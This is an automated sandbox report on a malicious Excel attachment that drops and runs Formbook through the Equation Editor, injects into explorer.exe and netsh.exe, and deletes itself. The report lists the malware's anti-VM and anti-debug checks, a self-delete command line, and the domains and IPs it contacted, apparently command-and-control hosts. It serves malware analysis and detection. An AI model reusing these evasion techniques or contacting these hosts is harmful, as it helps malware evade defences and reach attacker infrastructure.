Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D7353
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0091A37B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E1489
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00905485
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008EC5F0
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D351F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D4680
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DE6C1
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00972622
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095579A
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DC7BC
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096F8EE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DC85C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F286D
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097098E
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D29B2
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E69FE
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00955955
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00983A83
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0097CBA4
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0095DBDA
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CFBD7
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008F7B00
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0096FDDD
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00900D3B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008DCD5B
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00902E2F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008EEE4C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008E0F3F
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008FDF7C
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B6C0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F1238
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204E2E9
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02052305
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02057353
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0209A37B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204F3CF
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020763DB
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207D005
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02053040
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206905A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204E0C6
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F2622
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02054680
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205E6C1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020D579A
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205C7BC
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020857C3
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02085485
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02061489
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205351F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206C5F0
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02103A83
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02077B00
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020FCBA4
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204FBD7
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020DDBDA
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205C85C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207286D
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020EF8EE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020D5955
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020F098E
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020529B2
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020669FE
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02082E2F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0206EE4C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02060F3F
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0207DF7C
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_02080D3B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0205CD5B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020EFDDD
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B493
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B496
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020C539
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020C795
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B8B1
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B954
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F8C50
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F8C4B
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2D90
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2D89
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020CE85
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020BF12
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_001F2FB0

Source: C:\Users\Public\vbc.exe	Code function: String function: 008CE2A8 appears 38 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0093F970 appears 81 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 00913F92 appears 106 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 0091373B appears 238 times
Source: C:\Users\Public\vbc.exe	Code function: String function: 008CDF5C appears 105 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0204DF5C appears 107 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 02093F92 appears 108 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0209373B appears 238 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 020BF970 appears 81 times
Source: C:\Windows\SysWOW64\netsh.exe	Code function: String function: 0204E2A8 appears 38 times

Source: dun[1].exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: vbc.exe.4.dr	Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 7.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362795032.0000000000600000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362606058.00000000001F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198746522.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2198454714.0000000000220000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2197884630.0000000000080000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000009.00000002.2362716429.00000000002C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.2161637497.00000000038C9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@9/19@6/6

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$oustanding 03082921.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE629.tmp

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: oustanding 03082921.xlsx

ReversingLabs: Detection: 26%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\netsh.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\Public\vbc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Source: oustanding 03082921.xlsx

Static file information: File size 1328640 > 1048576

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: netsh.pdb source: vbc.exe, 00000007.00000002.2198845306.00000000004E9000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C836 push es; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; retf 0001h
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C976 push es; retn 0001h
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; iretd
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; retf
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B673 push es; retf 0001h
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137C9C6 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004078F4 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0137B6C0 push es; iretd
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B2A2 push cs; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3F2 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3FB push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B3A5 push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041B45C push eax; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415414 push esp; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00414F46 push cs; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0041BF12 push dword ptr [8427D5C5h]; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_00415FC5 push ebp; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; retf 0001h
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C976 push es; retn 0001h
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C9C6 push es; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137C836 push es; retf
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; iretd
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; retf
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B673 push es; retf 0001h
Source: C:\Users\Public\vbc.exe	Code function: 7_2_008CDFA1 push ecx; ret
Source: C:\Users\Public\vbc.exe	Code function: 7_2_0137B6C0 push es; iretd
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0204DFA1 push ecx; ret
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_0020B2A2 push cs; ret

Source: initial sample	Static PE information: section name: .text entropy: 6.91186053545
Source: initial sample	Static PE information: section name: .text entropy: 6.91186053545

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\dun[1].exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 3020, type: MEMORYSTR

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe	RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000001F85E4 second address: 00000000001F85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe	RDTSC instruction interceptor: First address: 00000000001F896E second address: 00000000001F8974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

Source: C:\Users\Public\vbc.exe

Thread delayed: delay time: 922337203685477

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2336	Thread sleep time: -240000s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 3008	Thread sleep time: -43005s >= -30000s
Source: C:\Users\Public\vbc.exe TID: 2952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 2808	Thread sleep time: -32000s >= -30000s

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netsh.exe	Last function: Thread delayed

Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 43005
Source: C:\Users\Public\vbc.exe	Thread delayed: delay time: 922337203685477

Source: explorer.exe, 00000008.00000000.2185246191.00000000001F5000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000008.00000000.2169813021.0000000004263000.00000004.00000001.sdmp	Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.2161353199.0000000002BFE000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Source: C:\Users\Public\vbc.exe

Process information queried: ProcessInformation

Source: C:\Users\Public\vbc.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\Public\vbc.exe

Code function: 7_2_004088A0 rdtsc

Source: C:\Users\Public\vbc.exe

Code function: 7_2_00409B10 LdrLoadDll,

Source: C:\Users\Public\vbc.exe	Code function: 7_2_008D26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\netsh.exe	Code function: 9_2_020526F8 mov eax, dword ptr fs:[00000030h]

Source: C:\Users\Public\vbc.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\netsh.exe	Process token adjusted: Debug

Source: C:\Users\Public\vbc.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.cleanxcare.com
Source: C:\Windows\explorer.exe	Domain query: www.ruhexuangou.com
Source: C:\Windows\explorer.exe	Network Connect: 163.44.239.73 80
Source: C:\Windows\explorer.exe	Domain query: www.iotcloud.technology
Source: C:\Windows\explorer.exe	Network Connect: 192.0.78.25 80
Source: C:\Windows\explorer.exe	Network Connect: 23.82.57.32 80
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe	Domain query: www.micheldrake.com
Source: C:\Windows\explorer.exe	Domain query: www.adultpeace.com
Source: C:\Windows\explorer.exe	Network Connect: 78.31.67.91 80

